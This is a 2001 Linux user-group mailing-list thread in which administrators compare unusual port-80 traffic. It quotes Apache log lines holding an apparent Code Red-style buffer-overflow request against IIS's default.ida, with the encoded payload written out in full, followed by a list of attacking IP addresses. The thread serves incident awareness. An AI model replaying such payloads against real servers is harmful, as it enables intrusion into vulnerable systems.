[TCLUG] Lots of denied packets. Port 80

Thu Jul 19 17:12:03 CDT 2001

Mike Horwath has a current posting in Usenet's mn.general on this problem.
Turns out, GETs with "?" in them lock up the router (as I recall).

Florin Iucha wrote:
> 
> On Thu, Jul 19, 2001 at 11:37:13PM +0200, Thomas Eibner wrote:
> > On Thu, Jul 19, 2001 at 05:28:52PM -0400, Dan Drake wrote:
> > > On Thu, Jul 19, 2001 at 11:23:27PM +0200, Thomas Eibner wrote:
> > > > On Thu, Jul 19, 2001 at 09:16:42PM +0000, kblack at isd.net wrote:
> > > > > Is anybody else running a firewall
> > > > > (and blocking port 80)
> > > > > noticing an unusual number of attacks today?
> > > 
> > >   Hmmmm. I'm seeing a lot of weird requests for "default.ida" in my logs
> > > (I'm running a web server and not blocking port 80). The accesses look
> > > weird, too...from a bunch of different IPs. I also have "Malformed HTTP
> > > header" (or something like that) in my error log.
> > 
> > 211.236.188.150 - - [19/Jul/2001:23:04:43 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > ip44-137.asiaonline.net - - [19/Jul/2001:23:12:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > 212.113.168.95 - - [19/Jul/2001:23:32:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 333 "-" "-"
> > 
> > Like these I take it?
> > 
> 
> The same here from these guys...
> 
> 213.26.234.70
> 209.223.50.51
> 207.101.212.130
> 212.163.165.26
> 65.3.198.239
> 198.145.154.193
> 211.62.36.37
> 211.172.225.63
> 202.123.80.2
> 150.164.98.130
> 24.184.153.172
> 133.66.35.7
> 62.49.221.130
> 210.160.177.165
> 12.76.115.253
> 149.169.25.4
> 193.183.19.90
> 66.46.75.98
> 
> florin
> 
> -- 
> 
> "If it's not broken, is because you are not fixing it enough."
> 
> 41A9 2BDE 8E11 F1C5 87A6  03EE 34B3 E075 3B90 DFE4
> _______________________________________________
> tclug-list mailing list
> tclug-list at mn-linux.org
> https://mailman.mn-linux.org/mailman/listinfo/tclug-list
> 